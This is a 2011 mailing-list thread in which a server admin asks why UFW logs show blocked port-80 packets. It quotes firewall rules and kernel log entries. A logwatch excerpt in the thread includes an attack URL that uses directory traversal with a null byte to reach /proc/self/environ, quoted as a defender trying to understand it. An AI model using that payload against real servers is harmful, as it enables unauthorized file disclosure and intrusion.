> -----Original Message----- > > Hello Dermot, > > as far as I can see, HTTP is blocked (DPT=80). > > Why are you using UFW. You've got a DMZ? > > > Regards Marcel Well I really hope that port 80 is open! I have not heard any complaints from users and I can still connect. The command I ran was `ufw allow "Apache Full"`. This should have enabled the profile for Apache that is stored in /etc/ufw/applications.d/apache2.2-common. I am using UFW because I wanted to reject connections from those hosts that I could find in the httpd logs that were attempt to run the php exploits, I mentioned. There is a firewall in front of the server. The rules for the firewall allow all traffic to port 80 but it's not directly under my control. I thought that UFW would give me finer control over what hosts could connection. Are you saying that the log entries I mentioned are for connections to port 80? Out of 300 log entries, 288 refer to DPT=80. I thought this rule would allow traffic to port 80: ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 multiport dports 80,443 /* 'dapp_Apache%20Full' Is it possible that these log entries refer to blocks to port 80 for some other reason, incomplete packets perhaps? Thanks, Dermot. Here are a few more log entries.: Dec 20 15:16:50 spl-live-04 kernel: [4815860.546796] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=5744 PROTO=TCP SPT=35936 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 Dec 20 15:17:10 spl-live-04 kernel: [4815880.590616] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=12876 PROTO=TCP SPT=38735 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 Dec 20 15:17:30 spl-live-04 kernel: [4815900.544664] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=148.134.37.3 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=42844 PROTO=TCP SPT=35936 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 Dec 20 15:17:52 spl-live-04 kernel: [4815921.978254] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=46.103.144.234 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=49496 DF PROTO=TCP SPT=49793 DPT=80 WINDOW=65535 RES=0x00 ACK RST URGP=0 Dec 20 15:18:11 spl-live-04 kernel: [4815940.856559] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=167.21.254.12 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=50 ID=22633 PROTO=TCP SPT=56527 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 Dec 20 15:18:31 spl-live-04 kernel: [4815961.228775] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=194.209.88.151 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=49 ID=36073 PROTO=TCP SPT=59930 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 Dec 20 15:18:50 spl-live-04 kernel: [4815980.576344] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=145.36.235.4 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=53 ID=45980 PROTO=TCP SPT=27691 DPT=80 WINDOW=1032 RES=0x00 ACK FIN URGP=0 Dec 20 15:19:11 spl-live-04 kernel: [4816001.276032] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=82.137.200.53 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=47 ID=36569 PROTO=TCP SPT=62544 DPT=80 WINDOW=1032 RES=0x00 ACK FIN URGP=0 Dec 20 15:19:31 spl-live-04 kernel: [4816021.003750] [UFW BLOCK] IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 SRC=34.254.119.222 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=58 ID=34212 PROTO=TCP SPT=53102 DPT=80 WINDOW=65535 RES=0x00 ACK FIN URGP=0 > > -----Original Message----- > > From: linux-admin-owner@xxxxxxxxxxxxxxx [mailto:linux-admin- > > owner@xxxxxxxxxxxxxxx] On Behalf Of Dermot Paikkos > > Sent: Tuesday, December 20, 2011 3:03 PM > > To: linux-admin@xxxxxxxxxxxxxxx > > Subject: UFW logging > > > > Hi, > > > > I noticed on our company http server that I had a lot of 'probes'. My > > logwatch file (text-mode) is 3+MB and rising. I have thousands of > > entries in my logwatch reports: > > > > A total of 5711 sites probed the server > > 1.152.198.116 > > 1.22.185.5 > > 1.23.105.130 > > 1.38.24.232 > > 1.38.25.24 > > 1.39.95.219 > > 1.53.101.185 > > 101.108.239.43 > > ... > > ... > > ... > > > > I'm not sure what the above probes are. Any help in understanding the > > above would be appreciated. > > > > I also have several entries like this: > > > > A total of 4 possible successful probes were detected (the following > > URLs > > contain strings that match one or more of a listing of strings that > > indicate a possible exploit): > > > > > > > /images/?option=com_sectionex&controller=../../../../../../../../../../ > . > > ./../..//proc/self/environ%0000 HTTP Response 200 > > /? > > > > I believe these are php exploits. > > > > To help secure the server, I installed UFW, enabled and allowed HTTP, > > HTTPS and SSH. I then monitored the logs to see what was happening. > What > > I am not clear on is what service the log entries below refer to. > > > > > > Dec 20 13:10:35 myserver kernel: [4808284.769172] [UFW BLOCK] > > IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 > > SRC=194.27.44.2 DST=217.222.0.x LEN=52 TOS=0x00 PREC=0x00 TTL=109 > > ID=10243 DF PROTO=TCP SPT=6565 DPT=80 WINDOW=4320 RES=0x00 ACK > > FIN > > URGP=0 > > Dec 20 13:11:01 myserver kernel: [4808311.356089] [UFW BLOCK] > > IN=eth0 OUT= MAC=00:16:3e:1e:65:85:00:0a:b7:96:5c:80:08:00 > > SRC=151.96.254.4 DST=217.222.0.x LEN=40 TOS=0x00 PREC=0x00 TTL=55 > > ID=44116 PROTO=TCP SPT=58842 DPT=80 WINDOW=1032 RES=0x00 ACK RST > > URGP=0 > > > > I am getting an entry like this every 20-30 seconds. Can anyone tell > me > > what service/port is being blocked in the above log entries? > > > > Below are the rules at the moment. > > Thanks in advance, > > Dermot > > > > Chain ufw-user-input (1 references) > > pkts bytes target prot opt in out source > > destination > > 29164 1620981 ACCEPT tcp -- * * 0.0.0.0/0 > > 0.0.0.0/0 tcp dpt:80 /* 'dapp_Apache' */ > > 5151 299728 ACCEPT tcp -- * * 0.0.0.0/0 > > 0.0.0.0/0 multiport dports 80,443 /* > 'dapp_Apache%20Full' > > */ > > 3 180 ACCEPT tcp -- * * 0.0.0.0/0 > > 0.0.0.0/0 tcp dpt:22 /* 'dapp_OpenSSH' */ > > 0 0 REJECT all -- * * 220.162.244.251 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 217.115.199.40 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 93.84.116.216 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 85.10.204.194 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 221.232.155.6 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 122.255.96.164 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 77.240.21.131 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > 0 0 REJECT all -- * * 83.170.79.6 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > > > Chain ufw-user-forward (1 references) > > pkts bytes target prot opt in out source > > destination > > > > Chain ufw-user-output (1 references) > > pkts bytes target prot opt in out source > > destination > > > > Chain ufw-user-limit-accept (0 references) > > pkts bytes target prot opt in out source > > destination > > 0 0 ACCEPT all -- * * 0.0.0.0/0 > > 0.0.0.0/0 > > > > Chain ufw-user-limit (0 references) > > pkts bytes target prot opt in out source > > destination > > 0 0 LOG all -- * * 0.0.0.0/0 > > 0.0.0.0/0 limit: avg 3/min burst 5 LOG flags 0 level 4 > > prefix `[UFW LIMIT BLOCK] ' > > 0 0 REJECT all -- * * 0.0.0.0/0 > > 0.0.0.0/0 reject-with icmp-port-unreachable > > -- > > To unsubscribe from this list: send the line "unsubscribe linux- > admin" in > > the body of a message to majordomo@xxxxxxxxxxxxxxx > > More majordomo info at http://vger.kernel.org/majordomo-info.html > -- > To unsubscribe from this list: send the line "unsubscribe linux-admin" > in > the body of a message to majordomo@xxxxxxxxxxxxxxx > More majordomo info at http://vger.kernel.org/majordomo-info.html -- To unsubscribe from this list: send the line "unsubscribe linux-admin" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
